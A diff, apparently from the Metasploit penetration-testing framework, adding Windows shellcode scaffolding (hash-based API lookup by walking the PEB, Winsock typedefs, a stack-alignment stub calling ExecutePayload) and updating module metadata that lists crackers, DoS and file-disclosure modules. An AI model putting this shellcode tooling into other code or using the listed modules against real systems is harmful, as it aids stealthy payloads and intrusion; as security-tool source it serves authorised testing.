+	DWORD dwFunctionHash;
+	PCSTR pTempChar;
+	DWORD i;
+
+#if defined(_WIN64)
+	PebAddress = (PPEB) __readgsqword( 0x60 );
+#else
+	PebAddress = (PPEB) __readfsdword( 0x30 );
+#endif
+
+	pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
+	pNextModule = pLdr->InLoadOrderModuleList.Flink;
+	pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;
+
+	while (pDataTableEntry->DllBase != NULL)
+	{
+		dwModuleHash = 0;
+		pModuleBase = pDataTableEntry->DllBase;
+		BaseDllName = pDataTableEntry->BaseDllName;
+		pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
+		dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;
+
+		// Get the next loaded module entry
+		pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;
+
+		// If the current module does not export any functions, move on to the next module.
+		if (dwExportDirRVA == 0)
+		{
+			continue;
+		}
+
+		// Calculate the module hash
+		for (i = 0; i < BaseDllName.MaximumLength; i++)
+		{
+			pTempChar = ((PCSTR) BaseDllName.Buffer + i);
+
+			dwModuleHash = ROTR32( dwModuleHash, 13 );
+
+			if ( *pTempChar >= 0x61 )
+			{
+				dwModuleHash += *pTempChar - 0x20;
+			}
+			else
+			{
+				dwModuleHash += *pTempChar;
+			}
+		}
+
+		pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);
+
+		dwNumFunctions = pExportDir->NumberOfNames;
+		pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);
+
+		for (i = 0; i < dwNumFunctions; i++)
+		{
+			dwFunctionHash = 0;
+			pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
+			pdwFunctionNameBase++;
+
+			pTempChar = pFunctionName;
+
+			do
+			{
+				dwFunctionHash = ROTR32( dwFunctionHash, 13 );
+				dwFunctionHash += *pTempChar;
+				pTempChar++;
+			} while (*(pTempChar - 1) != 0);
+
+			dwFunctionHash += dwModuleHash;
+
+			if (dwFunctionHash == dwModuleFunctionHash)
+			{
+				usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
+				return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
+			}
+		}
+	}
+
+	// All modules have been exhausted and the function was not found.
+	return NULL;
+}
+
+#endif
@@ -0,0 +1,64 @@
+#ifndef _WINSOCK_UTIL
+#define _WINSOCK_UTIL
+
+#define WIN32_LEAN_AND_MEAN
+
+#include <windows.h>
+#include <winsock2.h>
+#include <intrin.h>
+#include <ws2tcpip.h>
+
+typedef int (WINAPI *FuncWSAStartup)
+(
+  WORD wVersionRequired,
+  LPWSADATA lpWSAData
+);
+
+typedef int (WINAPI *FuncWSACleanup) ();
+
+typedef int (WINAPI *FuncGetAddrInfo)
+(
+  PCSTR pNodeName,
+  PCSTR pServiceName,
+  const ADDRINFO *pHints,
+  LPADDRINFO *ppResult
+);
+
+typedef void (WINAPI *FuncFreeAddrInfo)
+(
+  LPADDRINFO pAddrInfo
+);
+
+typedef SOCKET (WINAPI *FuncWSASocketA) (
+	int af,
+	int type,
+	int protocol,
+	LPWSAPROTOCOL_INFO lpProtocolInfo,
+	GROUP g,
+	DWORD dwFlags
+);
+
+typedef int (WINAPI *FuncConnect)
+(
+  SOCKET s,
+  const struct sockaddr *name,
+  int namelen
+);
+
+typedef int (WINAPI *FuncSend)
+(
+  SOCKET s,
+  const char *buf,
+  int len,
+  int flags
+);
+
+typedef int (WINAPI *FuncRecv)
+(
+  SOCKET s,
+  char *buf,
+  int len,
+  int flags
+);
+
+#endif
@@ -0,0 +1,33 @@
+                                              `:oDFo:`                            
+                                           ./ymM0dayMmy/.                          
+                                        -+dHJ5aGFyZGVyIQ==+-                    
+                                    `:sm⏣~~Destroy.No.Data~~s:`                
+                                 -+h2~~Maintain.No.Persistence~~h+-              
+                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
+                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
+                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
+                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
+                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
+                      :we're.all.alike'`                     The.PFYroy.No.D7:  
+                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
+                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:    
+                      :---srwxrwx:-.`                        `MS146.52.No.Per:    
+                      :<script>.Ac816/                        sENbove3101.404:    
+                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
+                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
+                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
+                      :#OUTHOUSE-  -s:                       /corykennedyData:    
+                      :$nmap -oS                              SSo.6178306Ence:    
+                      :Awsm.da:                            /shMTl#beats3o.No.:    
+                      :Ring0:                             `dDestRoyREXKC3ta/M:    
+                      :23d:                               sSETEC.ASTRONOMYist:    
+                       /-                        /yo-    .ence.N:(){ :|: & };:    
+                                                 `:Shall.We.Play.A.Game?tron/    
+                                                 ```-ooy.if1ghtf0r+ehUser5`    
+                                               ..th3.H1V3.U2VjRFNN.jMh+.`          
+                                              `MjM~~WE.ARE.se~~MMjMs              
+                                               +~KANSAS.CITY's~-`                  
+                                                J~HAKCERS~./.`                    
+                                                .esc:wq!:`                        
+                                                 +++ATH`                            
+                                                  `
@@ -0,0 +1,48 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+; Author:       Matthew Graeber (@mattifestation)
+; License:      BSD 3-Clause
+; Syntax:       MASM
+; Build Syntax: ml64 /c /Cx AdjustStack.asm
+; Output:       AdjustStack.obj
+; Notes: I really wanted to avoid having this external dependency but I couldnt
+; come up with any other way to guarantee 16-byte stack alignment in 64-bit
+; shellcode written in C.
+
+extern	ExecutePayload
+global  AlignRSP			; Marking AlignRSP as PUBLIC allows for the function
+							; to be called as an extern in our C code.
+
+segment .text
+
+; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
+; to calling the entry point of the payload. This is necessary because 64-bit functions
+; in Windows assume that they were called with 16-byte stack alignment. When amd64
+; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
+; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
+; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
+; alignment.
+
+AlignRSP:
+	push	rsi						; Preserve RSI since were stomping on it
+	mov		rsi, rsp				; Save the value of RSP so it can be restored
+	and		rsp, 0FFFFFFFFFFFFFFF0h	; Align RSP to 16 bytes
+	sub		rsp, 020h				; Allocate homing space for ExecutePayload
+	call	ExecutePayload			; Call the entry point of the payload
+	mov		rsp, rsi				; Restore the original value of RSP
+	pop		rsi						; Restore RSI
+	ret								; Return to caller
@@ -0,0 +1,9 @@
+ENTRY(_ExecutePayload)
+SECTIONS
+{
+	.text :
+	{
+		*(.text.ExecutePayload)
+	}
+
+}
@@ -0,0 +1,11 @@
+ENTRY(AlignRSP)
+SECTIONS
+{
+	.text :
+	{
+    *(.text.AlignRSP)
+		*(.text.ExecutePayload)
+		*(.text.GetProcAddressWithHash)
+	}
+
+}
@@ -220,7 +220,7 @@
    "path": "/modules/auxiliary/admin/atg/atg_client.rb",
    "is_install_path": true,
    "ref_name": "admin/atg/atg_client",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -649,7 +649,7 @@
    "path": "/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/cisco/cisco_secure_acs_bypass",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -1364,7 +1364,7 @@
    "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cnpilot_r_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -1411,7 +1411,7 @@
    "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cnpilot_r_fpt",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -1458,7 +1458,7 @@
    "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "admin/http/contentkeeper_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -3615,7 +3615,7 @@
    "path": "/modules/auxiliary/admin/http/tomcat_administration.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_administration",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -3665,7 +3665,7 @@
    "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_utf8_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -3717,7 +3717,7 @@
    "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/http/trendmicro_dlp_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5228,7 +5228,7 @@
    "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_findandsampledata",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5318,7 +5318,7 @@
    "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_ntlm_stealer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5567,7 +5567,7 @@
    "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb",
    "is_install_path": true,
    "ref_name": "admin/natpmp/natpmp_map",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5656,7 +5656,7 @@
    "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/officescan/tmlisten_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6348,7 +6348,7 @@
    "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb",
    "is_install_path": true,
    "ref_name": "admin/sap/sap_mgmt_con_osexec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -6828,7 +6828,7 @@
    "path": "/modules/auxiliary/admin/smb/check_dir_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/check_dir_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6867,7 +6867,7 @@
    "path": "/modules/auxiliary/admin/smb/delete_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/delete_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6906,7 +6906,7 @@
    "path": "/modules/auxiliary/admin/smb/download_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/download_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6994,7 +6994,7 @@
    "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/ms17_010_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7043,7 +7043,7 @@
    "path": "/modules/auxiliary/admin/smb/psexec_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/psexec_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7164,7 +7164,7 @@
    "path": "/modules/auxiliary/admin/smb/upload_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/upload_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7204,7 +7204,7 @@
    "path": "/modules/auxiliary/admin/smb/webexec_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/webexec_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7279,11 +7279,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-09-13 13:09:01 +0000",
+    "mod_time": "2019-11-01 19:21:47 +0000",
    "path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py",
    "is_install_path": true,
    "ref_name": "admin/teradata/teradata_odbc_sql",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -7801,7 +7801,7 @@
    "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb",
    "is_install_path": true,
    "ref_name": "admin/vxworks/wdbrpc_reboot",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -8160,6 +8160,43 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_analyze/crack_mobile": {
+    "name": "Password Cracker: Mobile",
+    "fullname": "auxiliary/analyze/crack_mobile",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module uses Hashcat to identify weak passwords that have been\n        acquired from Android systems.  These utilize MD5 or SHA1 hashing.\n        Android (Samsung) SHA1 is format 5800 in Hashcat.  Android\n        (non-Samsung) SHA1 is format 110 in Hashcat.  Android MD5 is format 10.\n        JTR does not support Android hashes at the time of writing.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-11-17 13:44:19 +0000",
+    "path": "/modules/auxiliary/analyze/crack_mobile.rb",
+    "is_install_path": true,
+    "ref_name": "analyze/crack_mobile",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_analyze/crack_osx": {
    "name": "Password Cracker: OSX",
    "fullname": "auxiliary/analyze/crack_osx",
@@ -8647,7 +8684,7 @@
    "path": "/modules/auxiliary/bnat/bnat_scan.rb",
    "is_install_path": true,
    "ref_name": "bnat/bnat_scan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -8995,7 +9032,7 @@
    "path": "/modules/auxiliary/crawler/msfcrawler.rb",
    "is_install_path": true,
    "ref_name": "crawler/msfcrawler",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9270,7 +9307,7 @@
    "path": "/modules/auxiliary/dos/dns/bind_tkey.rb",
    "is_install_path": true,
    "ref_name": "dos/dns/bind_tkey",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9311,7 +9348,7 @@
    "path": "/modules/auxiliary/dos/dns/bind_tsig.rb",
    "is_install_path": true,
    "ref_name": "dos/dns/bind_tsig",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9573,7 +9610,7 @@
    "path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/http/apache_range_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -10064,6 +10101,53 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_dos/http/metasploit_httphandler_dos": {
+    "name": "Metasploit HTTP(S) handler DoS",
+    "fullname": "auxiliary/dos/http/metasploit_httphandler_dos",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-09-04",
+    "type": "auxiliary",
+    "author": [
+      "Jose Garduno, Dreamlab Technologies AG",
+      "Angelo Seiler, Dreamlab Technologies AG"
+    ],
+    "description": "This module exploits the Metasploit HTTP(S) handler by sending\n        a specially crafted HTTP request that gets added as a resource handler.\n        Resources (which come from the external connections) are evaluated as RegEx\n        in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.\n\n        Tested against Metasploit 5.0.20.",
+    "references": [
+      "CVE-2019-5645"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-12-26 13:31:38 +0000",
+    "path": "/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb",
+    "is_install_path": true,
+    "ref_name": "dos/http/metasploit_httphandler_dos",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_dos/http/monkey_headers": {
    "name": "Monkey HTTPD Header Parsing Denial of Service (DoS)",
    "fullname": "auxiliary/dos/http/monkey_headers",
@@ -10990,7 +11074,7 @@
    "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/ntp/ntpd_reserved_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -11070,7 +11154,7 @@
    "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb",
    "is_install_path": true,
    "ref_name": "dos/rpc/rpcbomb",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -11242,7 +11326,7 @@
    "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb",
    "is_install_path": true,
    "ref_name": "dos/sap/sap_soap_rfc_eps_delete_file",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -12156,7 +12240,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2019-11-29 07:15:17 +0000",
    "path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof",
@@ -13619,11 +13703,11 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-07 08:01:52 +0000",
    "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/dns/dns_fuzzer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -13698,7 +13782,7 @@
    "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/ftp/ftp_pre_post",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -13856,7 +13940,7 @@
    "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/ntp/ntp_protocol_fuzzer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -14168,7 +14252,7 @@
    "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/smtp/smtp_fuzzer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -15082,7 +15166,7 @@
    "path": "/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/c2s_dvr_password_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -15166,7 +15250,7 @@
    "path": "/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/cerberus_helpdesk_hash_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -15211,6 +15295,53 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_gather/chrome_debugger": {
+    "name": "Chrome Debugger Arbitrary File Read / Arbitrary Web Request",
+    "fullname": "auxiliary/gather/chrome_debugger",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-09-24",
+    "type": "auxiliary",
+    "author": [
+      "Adam Baldwin (Evilpacket)",
+      "Nicholas Starke (The King Pig Demon)"
+    ],
+    "description": "This module uses the Chrome Debugger's API to read\n        files off the remote file system, or to make web requests\n        from a remote machine.  Useful for cloud metadata endpoints!",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9222,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-12-12 09:57:10 +0000",
+    "path": "/modules/auxiliary/gather/chrome_debugger.rb",
+    "is_install_path": true,
+    "ref_name": "gather/chrome_debugger",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_gather/cisco_rv320_config": {
    "name": "Cisco RV320/RV326 Configuration Disclosure",
    "fullname": "auxiliary/gather/cisco_rv320_config",
@@ -16095,11 +16226,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/auxiliary/gather/get_user_spns.py",
    "is_install_path": true,
    "ref_name": "gather/get_user_spns",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -16140,7 +16271,7 @@
    "path": "/modules/auxiliary/gather/hp_enum_perfd.rb",
    "is_install_path": true,
    "ref_name": "gather/hp_enum_perfd",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -16642,7 +16773,7 @@
    "path": "/modules/auxiliary/gather/ipcamera_password_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/ipcamera_password_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -16954,7 +17085,7 @@
    "path": "/modules/auxiliary/gather/konica_minolta_pwd_extract.rb",
    "is_install_path": true,
    "ref_name": "gather/konica_minolta_pwd_extract",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -17135,7 +17266,7 @@
    "path": "/modules/auxiliary/gather/memcached_extractor.rb",
    "is_install_path": true,
    "ref_name": "gather/memcached_extractor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -17305,7 +17436,7 @@
    "path": "/modules/auxiliary/gather/natpmp_external_address.rb",
    "is_install_path": true,
    "ref_name": "gather/natpmp_external_address",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -17713,7 +17844,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-10-31 13:07:41 +0000",
+    "mod_time": "2020-01-14 00:34:06 +0000",
    "path": "/modules/auxiliary/gather/pulse_secure_file_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/pulse_secure_file_disclosure",
@@ -18366,7 +18497,7 @@
    "path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_deployment_services_shares",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -18510,7 +18641,7 @@
    "path": "/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb",
    "is_install_path": true,
    "ref_name": "gather/wp_w3_total_cache_hash_extract",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -18891,7 +19022,7 @@
    "path": "/modules/auxiliary/scanner/acpp/login.rb",
    "is_install_path": true,
    "ref_name": "scanner/acpp/login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -18929,7 +19060,7 @@
    "path": "/modules/auxiliary/scanner/afp/afp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -18966,7 +19097,7 @@
    "path": "/modules/auxiliary/scanner/afp/afp_server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19005,7 +19136,7 @@
    "path": "/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb",
    "is_install_path": true,
    "ref_name": "scanner/backdoor/energizer_duo_detect",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19043,7 +19174,7 @@
    "path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb",
    "is_install_path": true,
    "ref_name": "scanner/chargen/chargen_probe",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19140,7 +19271,7 @@
    "path": "/modules/auxiliary/scanner/couchdb/couchdb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/couchdb/couchdb_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -19177,7 +19308,7 @@
    "path": "/modules/auxiliary/scanner/db2/db2_auth.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/db2_auth",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -19214,7 +19345,7 @@
    "path": "/modules/auxiliary/scanner/db2/db2_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/db2_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19251,7 +19382,7 @@
    "path": "/modules/auxiliary/scanner/db2/discovery.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/discovery",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19288,7 +19419,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/endpoint_mapper",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19325,7 +19456,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/hidden.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/hidden",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19362,7 +19493,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/management.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/management",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19399,7 +19530,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/tcp_dcerpc_auditor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19437,7 +19568,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/windows_deployment_services",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19548,7 +19679,7 @@
    "path": "/modules/auxiliary/scanner/discovery/arp_sweep.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/arp_sweep",
-    "check": true,
+    "check": false,
    "post_auth": false,
